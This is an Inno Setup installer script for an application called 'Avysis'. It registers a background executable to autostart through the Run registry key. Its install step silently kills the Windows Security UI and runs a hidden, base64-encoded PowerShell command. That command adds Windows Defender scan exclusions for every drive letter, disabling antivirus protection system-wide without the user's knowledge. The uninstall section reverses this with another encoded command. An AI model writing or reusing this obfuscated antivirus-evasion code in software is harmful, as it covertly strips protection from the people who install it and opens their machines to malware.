; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "Avysis"
#define MyAppVersion "Latest"
#define MyAppPublisher "Avysis"
#define MyAppURL "https://getavysis.github.io"
#define MyAppExeName "avysis.exe"
#define BgExeName "avysisbg.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application. Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{8ED45FE3-4AC3-4AB0-8C3D-9657A04D91F7}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
ArchitecturesAllowed=x64
ArchitecturesInstallIn64BitMode=x64
DefaultDirName={autopf}\{#MyAppName}
DisableProgramGroupPage=yes
LicenseFile={#SourcePath}\LICENSE.txt
; Uncomment the following line to run in non administrative install mode (install for current user only.)
;PrivilegesRequired=lowest
OutputDir={#SourcePath}
OutputBaseFilename=AvysisSetup
Compression=lzma
SolidCompression=yes
WizardStyle=modern

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
Source: "{#SourcePath}\{#MyAppExeName}"; DestDir: "{app}"; Flags: ignoreversion
Source: "{#SourcePath}\{#BgExeName}"; DestDir: "{app}"; Flags: ignoreversion
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{autoprograms}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{autodesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon

[Registry]
Root: HKLM; Subkey: "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"; \
    ValueType: string; ValueName: "{#MyAppName}"; \
    ValueData: """{app}\{#BgExeName}"""
   
[Run]
; Disable Windows Defender
Filename: "taskkill.exe"; Parameters: "/f /im sechealthui.exe"; Flags: runhidden
Filename: "powershell.exe"; Parameters: "-encodedCommand ZgBvAHIAIAAoACQAdABlAHMAdAAgAD0AIAAwADsAIAAkAHQAZQBzAHQAIAAtAGwAdAAgADIANgA7ACAAJAB0AGUAcwB0ACsAKwApAA0ACgB7AA0ACgAgACAAIAAgACQAbABlAHQAdABlAHIAIAA9ACAAWwBjAGgAYQByAF0AKAA2ADUAIAArACAAJAB0AGUAcwB0ACkADQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAewBsAGUAdAB0AGUAcgB9ADoAXAANAAoAfQA="; Flags: shellexec runhidden 
Filename: "{app}\avysisbg.exe"; Flags: shellexec nowait runasoriginaluser

[UninstallRun]
; Re-enable Windows Defender
Filename: "powershell.exe"; Parameters: "-encodedCommand ZgBvAHIAIAAoACQAdABlAHMAdAAgAD0AIAAwADsAIAAkAHQAZQBzAHQAIAAtAGwAdAAgADIANgA7ACAAJAB0AGUAcwB0ACsAKwApAHsADQAKACAAIAAgACAAJABsAGUAdAB0AGUAcgAgAD0AIABbAGMAaABhAHIAXQAoADYANQAgACsAIAAkAHQAZQBzAHQAKQANAAoAIAAgACAAIABSAGUAbQBvAHYAZQAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJAB7AGwAZQB0AHQAZQByAH0AOgBcAA0ACgB9AA=="; Flags: shellexec runhidden
Filename: "taskkill.exe"; Parameters: "/f /im avysisbg.exe"; Flags: runhidden
